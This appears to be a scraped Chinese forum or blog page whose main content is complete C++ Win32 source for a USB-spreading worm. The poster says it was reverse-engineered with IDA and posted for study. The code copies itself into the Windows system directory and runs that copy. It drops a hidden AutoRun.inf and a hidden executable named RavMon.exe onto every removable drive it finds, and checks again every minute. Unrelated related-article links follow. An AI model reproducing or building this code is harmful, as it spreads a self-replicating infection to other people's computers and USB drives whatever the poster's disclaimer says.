c语言弹出u盘 api,一个简单的C++编写的u盘病毒代码

该楼层疑似违规已被系统折叠隐藏此楼查看此楼

一个简单的C++编写的u盘病毒代码

一个win32下能用的U盘病毒研究原理可以别编译拿去害人就行 (ring3的病毒貌似也害不了人) 前久用IDA逆向出来的感兴趣的可以看看。。。#include#include BOOL UDevice(); void ResourceToFile(char *filename,char *Name,char* Type); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { UDevice(); return 0; } BOOL UDevice() { while(1) { char Name[256]="H:\\"; char szName[256]; char ToPath[256]; char infPath[256]; char OpenUDevice[79]; UINT retType; memset(szName, 0, 256); memset(ToPath, 0, 256); memset(infPath, 0, 256); memset(OpenUDevice, 0, 79); //do //{ //}while() //遍历盘符 unsigned char i = 0x42; for(; i < 0x5B; i += 0x1) { Name[0] = i; retType = GetDriveType(Name); //判断是否是可移动存储设备 if(retType == DRIVE_REMOVABLE) { //得到自身文件路径 GetModuleFileName(NULL, szName, 256); //比较是否和U盘的盘符相同 if(strncmp(Name, szName, 1) == 0) { //得到系统目录 GetSystemDirectory(ToPath, 256); strcat(ToPath,"\\Uinfect.exe"); //把自身文件复制到系统目录 if(CopyFile(szName, ToPath, TRUE)) { WinExec(ToPath, 0);//运行程序 } strcpy(OpenUDevice, "explorer "); strcat(OpenUDevice, Name); //打开U盘 WinExec(OpenUDevice,1); return 0; } else { strcpy(ToPath, Name); strcat(ToPath,"\\RavMon.exe"); strcpy(infPath,Name); strcat(infPath,"\\AutoRun.inf"); //还原U盘上的文件属性 SetFileAttributes(ToPath,FILE_ATTRIBUTE_NORMAL); SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL); //删除原有文件 DeleteFile(ToPath); DeleteFile(infPath); //释放AutoRun.inf到U盘 ResourceToFile(infPath, (char*)0x64, (char*)256); //拷贝自身文件到U盘 CopyFile(szName,ToPath,FALSE); //把这两个文件设置成系统，隐藏属性 //这里我查了MSDN 因为第二个参数的宏可能用了或位运算，所以推导宏定义有点麻烦 SetFileAttributes(ToPath, 0x6); SetFileAttributes(infPath, 0x6); } } } //一分钟检测一次U盘 Sleep(60000); } } void ResourceToFile(char *filename,char *Name,char* Type){ //寻找自身进程中的资源 HRSRC hRes = FindResource(NULL,Name,Type); if(hRes==NULL) return; //导入资源 HGLOBAL hgRes = LoadResource(NULL, hRes); if(hgRes==NULL) return; //锁定资源 void *pRes = LockResource(hgRes); if(pRes==NULL) return; //得到资源字节数 DWORD size = SizeofResource(NULL, hRes); if(size==0) return; //创建文件 HANDLE hFile = CreateFile(filename, 0x40000000, 0, 0, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, 0); if(hFile==INVALID_HANDLE_VALUE) return; DWORD dwWrite; //把资源写入到文件 if(!WriteFile(hFile, pRes, size, &dwWrite, 0)) return; //关闭文件句柄 CloseHandle(hFile); //释放资源 GlobalFree(hgRes);}

c语言弹出u盘 api,一个简单的C++编写的u盘病毒代码相关推荐

c语言编写u盘杀毒软件,一个简单的C++编写的u盘病毒代码
该楼层疑似违规已被系统折叠隐藏此楼查看此楼一个简单的C++编写的u盘病毒代码一个win32下能用的U盘病毒研究原理可以别编译拿去害人就行 (ring3的病毒貌似也害不了人) 前久用IDA逆向 ...
layer弹出信息框API
layer API之键值(仅在需要时配置,未配置的会用默认) 键 : 值描述 skin : 0 层的皮肤编号,值为整数型.目前默认只提供一种皮肤,当你按照样式规则新增皮肤时(详见skin/layer ...
win7自动弹出计算机硬盘窗口,Win7弹出“Windows检测到一个硬盘问题”窗口怎么关闭...
win7系统遇到一件很奇怪的问题,Win7经常弹出"Windows检测到一个硬盘问题"窗口,怎么关闭?大部分是由于硬盘可能出现坏道引起的,如果不想更换硬盘,而此时系统也还能使用,那 ...
taobao.trades.sold.get-查询卖家已卖出的交易数据（根据创建时间),淘宝店铺卖出订单查询API接口，R2接口，oAuth2.0交易接口代码分享
一.taobao.trades.sold.get-查询卖家已卖出的交易数据(根据创建时间),淘宝店铺卖出订单查询API接口,R2接口,oAuth2.0交易接口代码分享搜索当前会话用户作为卖家已卖出的 ...
php网页，想弹出对话框，消息框简单代码
php网页,想弹出对话框, 消息框简单代码 <?php echo "<script language=\"JavaScript\">alert(\&q ...
一个简单的makefile编写VCS仿真
一个简单的makefile编写VCS仿真 1 VCS简介 VCS是编译型Verilog模拟器,它完全支持OVI标准的Verilog HDL语言.PLI和SDF. VCS具有行业中较高的模拟性能,其出色 ...
python getmenu不到菜单句柄,从弹出菜单win32 api Python中选择项目
我在 Windows 7 64位机器上使用python 2.7(32位).我正在使用win32 Api自动执行一些Windows任务,我也是python和win32 api的新手.我看到了类似的问题, ...
弹出窗口lhgDialog API文档
如果您使用独立版本的lhgDialog窗口组件,您只需在页面head中引入lhgcore.lhgdialog.min.js文件,4.1.1+版本做了修改可以和jQuerya库同时引用,而且4.1.1+ ...
(转)弹出窗口lhgDialog API文档
应用到你的项目如果您使用独立版本的lhgDialog窗口组件,您只需在页面head中引入lhgcore.lhgdialog.min.js文件,4.1.1+版本做了修改可以和jQuerya库同时引用, ...
lhgdialog 弹出窗口插件 API
lhgdialog是一功能强大的简单迷你并且高效的弹出窗口组件通过以下代码弹出窗口使用字面量传参 $.dialog(options) vardialog=$.dialog({title:'欢迎', ...

c语言弹出u盘 api,一个简单的C++编写的u盘病毒代码

c语言弹出u盘 api,一个简单的C++编写的u盘病毒代码相关推荐

最新文章

热门文章